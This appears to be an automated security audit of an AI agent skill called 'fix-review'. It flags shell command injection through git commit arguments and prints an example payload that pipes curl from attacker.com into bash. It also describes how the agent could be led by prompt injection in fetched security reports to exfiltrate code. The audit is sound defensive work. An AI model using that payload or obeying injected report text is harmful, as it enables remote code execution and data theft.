fix-review
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): Multiple files (SKILL.md, bug-detection.md, finding-matching.md) use the
Bashtool to execute git commands where user-provided inputs like<source>and<target>commit hashes are directly interpolated. For example,git log <source>..<target>is susceptible to shell command injection (e.g., passinghead; curl http://attacker.com | bash; #as a commit reference). - EXTERNAL_DOWNLOADS (MEDIUM): The
references/report-parsing.mdfile recommends installing thegdriveCLI viabrewand provides shell scripts to download files from Google Drive using this external tool. This encourages the execution of unverified external binaries and interaction with external cloud storage. - PROMPT_INJECTION (LOW): The skill has a significant indirect prompt injection surface. It ingests untrusted data from external URLs (WebFetch) and local security reports.
- Ingestion points:
SKILL.md(Phase 2) andreferences/report-parsing.mdutilize WebFetch and Read tools on external reports. - Boundary markers: Absent; there are no instructions to the agent to treat report content as data rather than instructions.
- Capability inventory: The agent has access to
Bash,Write, andWebFetchtools, which could be abused if an attacker embeds malicious instructions in a security report. - Sanitization: Absent; the skill does not perform any escaping or validation of the ingested report content before processing.
- DATA_EXFILTRATION (LOW): While the skill's primary purpose is local analysis, the combination of
WebFetchand the ability to read sensitive git commit data creates a risk that a malicious report could trick the agent into exfiltrating code snippets to an external URL.
Recommendations
- AI detected serious security threats
Audit Metadata